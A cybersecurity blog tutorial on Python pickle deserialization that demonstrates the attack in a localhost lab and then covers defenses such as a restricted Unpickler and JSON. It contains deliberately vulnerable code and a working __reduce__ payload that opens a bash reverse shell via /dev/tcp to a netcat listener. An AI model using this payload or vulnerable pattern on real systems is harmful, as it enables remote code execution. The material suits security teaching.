Niklas Heringer - Cybersecurity Blog

Python Deserialization Attacks Explained: How Hackers Exploit Pickle (and How to Defend)

Heard someone talk about .NET serialization? Vulnerabilities involving byte streams? Something like that?

You might not have, but deserialization bugs are common, powerful and often misunderstood.

Let’s take a deep technical look at deserialization attacks, focusing on Python - .NET and Ruby will follow in later posts.

Introduction to Python Deserialization Attacks

Serialization is the “process of converting a data structure or object into a byte stream”, which makes it easy to save data to a file or transmit it over a network. The reverse process is deserialization: converting a byte stream back into the original data structure or object.

Serialization is kind of like freezing an object in time - deserialization is waking it back up.

However, this convenient process can be extremely dangerous: if you deserialize user-supplied data without strict controls, you might just wake up a bomb.

What are Deserialization Attacks?

In a deserialization attack, an attacker embeds malicious code in serialized data, which is then executed when the data is deserialized.

You can read more about the formal definition and risk management perspective of that here: https://owasp.org/www-community/vulnerabilities/Insecure_Deserialization

How Python’s Pickle Module Works (Serialization & Deserialization Explained)

In this section, I’m referencing this great article; be sure to check it out and see how they explain it!

Hackers love Python’s Pickle module - and not because it’s tasty. In the wrong hands, Pickle can turn your server into an open door for remote code execution. In this guide, you’ll learn how Python deserialization attacks work, see a real exploit in action, and learn exactly how to defend against them.

pickle is included in the Python standard library, so no need to install it.

It mainly serves to (de-)serialize Python objects, whether that be simple data or complex structures like dictionaries.

Serializing Python Objects

import pickle

data = {
    'Name': 'James Bond',
    'Rank': 'Commander, Royal Navy Reserve',
    'Birthday': '13. April 1968',
    'Hair': 'Sandy brown, short'
}

with open('bond.pickle', 'wb') as handle:
    pickle.dump(data, handle)

data_bytes = pickle.dumps(data)
print(data_bytes)

pickle.dump writes the serialized object to the file we opened, while pickle.dumps returns the serialized data as a bytes object:

Serialized Object: Showcase

b'\x80\x04\x95x\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04Name\x94\x8c\nJames Bond\x94\x8c\x04Rank\x94\x8c\x1dCommander, Royal Navy Reserve\x94\x8c\x08Birthday\x94\x8c\x0e13. April 1968\x94\x8c\x04Hair\x94\x8c\x12Sandy brown, short\x94u.'

Protocol Note

When using pickle.dump, you can pass protocol=pickle.HIGHEST_PROTOCOL to use the newest pickle protocol your Python version supports, which is usually the most compact and efficient one (though this won’t help you with security!).
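As a small sketch of what the protocol argument changes (the sample dictionary is made up for illustration): the same object is pickled with every protocol the running interpreter supports. The bytes differ from protocol to protocol, but the restored object does not, and pickle.loads detects the protocol on its own.

```python
import pickle

data = {"Name": "James Bond", "Rank": "Commander"}

# Pickle the same object with every protocol this interpreter supports.
sizes = {}
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(data, protocol=protocol)
    sizes[protocol] = len(blob)
    # The protocol only changes the encoding, never the restored object.
    assert pickle.loads(blob) == data

for protocol, size in sizes.items():
    print(f"protocol {protocol}: {size} bytes")

print("default protocol:", pickle.DEFAULT_PROTOCOL)
```

None of these protocols is any safer than the others; they only differ in encoding and efficiency.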

Deserializing Python Objects

If you want to reverse what we just did, follow along:

import pickle

with open('bond.pickle', 'rb') as handle:
    data = pickle.load(handle)
    print(data)

outputs (who would’ve thought):

{'Name': 'James Bond', 'Rank': 'Commander, Royal Navy Reserve', 'Birthday': '13. April 1968', 'Hair': 'Sandy brown, short'}

You can also directly deserialize a byte stream: data = pickle.loads(data_bytes).

Now, onto the real deal: Should we do a real deserialization example? Yaaay!

Exploiting Python Pickle Deserialization Vulnerabilities – A Step-by-Step Example

Let’s say we find a Python web application that accepts user-supplied data, stores it as a pickled object, and later loads it for session handling, caching, or state restoration.

Here’s a vulnerable snippet simulating that behavior:

Vulnerable code

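import base64
import pickle

def load_user_data(serialized_data):
    # pickle.loads() does whatever the byte stream tells it to do
    return pickle.loads(serialized_data)

# Simulated untrusted input from user/session/cookie etc.
# Raw pickle bytes don't survive a text prompt, so we expect base64 here.
user_input = base64.b64decode(input("Paste your base64-encoded serialized data: "))
user_data = load_user_data(user_input)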

This code blindly deserializes whatever input it receives. Now let’s exploit it.

Crafting a Malicious Payload

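We’ll build a Python class that triggers arbitrary command execution upon deserialization - using the __reduce__() method. __reduce__() tells pickle how to rebuild an object: it returns a callable plus a tuple of arguments, and the unpickler calls that callable with those arguments while loading.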
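Here is a harmless sketch of that mechanism first. The class name Sneaky and the choice of sorted are made up for illustration; the point is only that whatever callable __reduce__() returns is what pickle calls at load time.

```python
import pickle

class Sneaky:
    def __reduce__(self):
        # Tell pickle: "to rebuild me, call sorted([3, 1, 2])".
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Sneaky())

# loads() does not rebuild a Sneaky instance; it calls sorted(...)
# and hands back whatever that call returns.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

Swap sorted for os.system and the list for a shell command, and the same mechanism runs a command on the machine that loads the pickle.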

Step 1: Attacker creates and saves malicious pickle

# attacker.py

import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('/bin/bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"',))

payload = pickle.dumps(Exploit())

with open("malicious.pkl", "wb") as f:
    f.write(payload)

print("[*] Malicious pickle written to file.")

This simulates the attacker crafting a payload and sending it to the server (via a file, cookie, request, etc.).

Step 2: Victim deserializes the malicious object

# victim.py

import pickle

with open("malicious.pkl", "rb") as f:
    data = f.read()

print("[*] Deserializing received object...")
pickle.loads(data)

Step 3: Simulate

Start a listener with nc -lvnp 4444 in a terminal on your computer.

In a second terminal, run python3 attacker.py to serialize our payload into malicious.pkl. (No chmod +x is needed, since both scripts are passed to the interpreter directly.)

Then pretend you are the unknowing victim (e.g. the web app mentioned above) and run python3 victim.py. The listener should receive an interactive bash shell running as the victim’s user.


How to Defend Against Python Deserialization Attacks

Principle of Secure Deserialization

The number one rule is simple: Never deserialize data from untrusted sources.

Python’s pickle module is powerful - but also dangerous. It was never designed for secure use with external input. If an attacker can influence the serialized data, they can embed malicious logic that executes arbitrary code at deserialization time.

Even if you’re deserializing internal data, it’s worth asking: “What happens if this data gets tampered with?”
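One way to make tampering detectable is to sign the pickled bytes and verify the signature before loading. The following is a minimal sketch using the standard library's hmac module; SECRET_KEY, signed_dumps and verified_loads are hypothetical names for this illustration, and the scheme only helps as long as the key stays secret.

```python
import hashlib
import hmac
import pickle

# Hypothetical secret for this sketch; a real one would come from secure
# configuration, never from source code.
SECRET_KEY = b"change-me"
DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes

def signed_dumps(obj):
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickle bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def verified_loads(blob):
    """Check the tag first; only unpickle when it matches."""
    tag, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

blob = signed_dumps({"user": "alice"})
print(verified_loads(blob))

# Flip one bit in the payload to simulate tampering.
tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
try:
    verified_loads(tampered)
except ValueError as exc:
    print("rejected:", exc)
```

A signature proves the data came from someone holding the key; it does nothing against an attacker who has obtained that key or who can get the application itself to pickle attacker-chosen objects.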


Option 1: Restrict What Can Be Deserialized

If you must use pickle, consider tightly controlling what types can be reconstructed. One way to do this is by subclassing pickle.Unpickler and overriding its behavior.

Example: Safe Unpickler with Type Restrictions

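import builtins
import io
import pickle

# Allowlist of built-in types that may be looked up during unpickling
SAFE_BUILTINS = {"str", "list", "dict", "set", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # find_class() is called for every global the pickle references;
        # anything outside the allowlist is rejected before it can run
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"Attempted to load forbidden class: {module}.{name}")

def restricted_loads(s):
    """Drop-in replacement for pickle.loads() using the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(s)).load()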

Usage:

data = restricted_loads(serialized_input)

This approach lets you deserialize known-safe types like dictionaries or strings, but blocks all function references, classes, and system calls that attackers often use in exploits.
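To see the restriction in action, here is a self-contained sketch that repeats the unpickler and feeds it both plain data and a malicious pickle. The Exploit class uses a harmless echo command as a stand-in for the reverse shell from the exploit section; it never runs, because the lookup of os.system is refused first.

```python
import builtins
import io
import os
import pickle

SAFE_BUILTINS = {"str", "list", "dict", "set", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"forbidden: {module}.{name}")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Exploit:
    def __reduce__(self):
        # Harmless stand-in for a real attack command.
        return (os.system, ("echo this should never run",))

# Plain data passes through untouched.
print(restricted_loads(pickle.dumps({"name": "James Bond", "ids": [0, 0, 7]})))

# The malicious pickle is rejected when it tries to look up os.system.
try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```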

Caveat: This still isn’t bulletproof. It’s a band-aid over a fundamentally unsafe mechanism. Avoid pickle entirely for any remotely user-controlled input.

Option 2: Use a Safer Format – JSON

In most cases, you don’t need pickle. If your app just stores basic data like strings, numbers, lists, or dictionaries - use json.

Example:

import json

# Serialize
data = {'username': 'alice', 'roles': ['user', 'admin']}
data_json = json.dumps(data)

# Deserialize
data = json.loads(data_json)

JSON won’t let you encode custom Python objects or functions - and that’s exactly why it’s safe.
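A short sketch of both halves of that claim: json.dumps refuses objects it cannot represent as plain data, and after json.loads you still want to check that the data has the shape you expect. The Exploit class is an empty stand-in, and load_profile with its username/roles schema is a hypothetical example, not a fixed recipe.

```python
import json

class Exploit:
    """Stand-in for any custom object an attacker might want to smuggle in."""

# json.dumps() refuses objects it has no plain-data representation for.
try:
    json.dumps({"payload": Exploit()})
except TypeError as exc:
    print("cannot encode:", exc)

def load_profile(text):
    """Parse JSON and check the shape we expect (hypothetical schema)."""
    data = json.loads(text)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    if not isinstance(data.get("username"), str):
        raise ValueError("username must be a string")
    roles = data.get("roles")
    if not isinstance(roles, list) or not all(isinstance(r, str) for r in roles):
        raise ValueError("roles must be a list of strings")
    return data

print(load_profile('{"username": "alice", "roles": ["user", "admin"]}'))
```

Parsing JSON only ever yields dicts, lists, strings, numbers, booleans and None, so the worst a malformed document can do here is fail validation.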

TL;DR Defensive Checklist

| ✅ Safe Practice | 🚫 Avoid |
| --- | --- |
| Use json, yaml.safe_load, or custom schemas | pickle.loads() on untrusted data |
| If using pickle, restrict types with a custom Unpickler | Using eval() or marshal with user input |
| Validate and sanitize all input before deserialization | Blindly trusting data from files, cookies, or sessions |

Bonus Tip: Log What You’re Deserializing

In applications that require complex data loading, log the structure of what you’re deserializing before acting on it. This can catch anomalies and help with incident response if things go wrong.
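For pickle data specifically, the standard library's pickletools module can walk the opcode stream without executing it, which makes it a reasonable basis for such logging. The sketch below is one possible approach; summarize_pickle, log_pickle, the logger name and the SUSPICIOUS_OPCODES set are assumptions made for this illustration, and the Exploit payload is only dumped, never loaded.

```python
import logging
import os
import pickle
import pickletools

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("deserialization")

# Opcodes that import a global or call/construct something during loading.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "BUILD",
}

def summarize_pickle(data):
    """Walk the opcode stream without executing it and count each opcode."""
    counts = {}
    for opcode, arg, pos in pickletools.genops(data):
        counts[opcode.name] = counts.get(opcode.name, 0) + 1
    return counts

def log_pickle(data):
    """Log a summary of the pickle and return the suspicious opcodes found."""
    counts = summarize_pickle(data)
    flagged = sorted(set(counts) & SUSPICIOUS_OPCODES)
    log.info("pickle of %d bytes, opcodes: %s", len(data), counts)
    if flagged:
        log.warning("pickle imports or calls objects: %s", flagged)
    return flagged

class Exploit:
    def __reduce__(self):
        # Harmless stand-in command; this pickle is never loaded here.
        return (os.system, ("echo this should never run",))

log_pickle(pickle.dumps({"name": "James Bond", "ids": [0, 0, 7]}))
log_pickle(pickle.dumps(Exploit()))
```

Treat this as triage and audit logging, not as a filter: legitimate pickles of custom classes also use these opcodes, so a clean log entry does not make untrusted data safe to load.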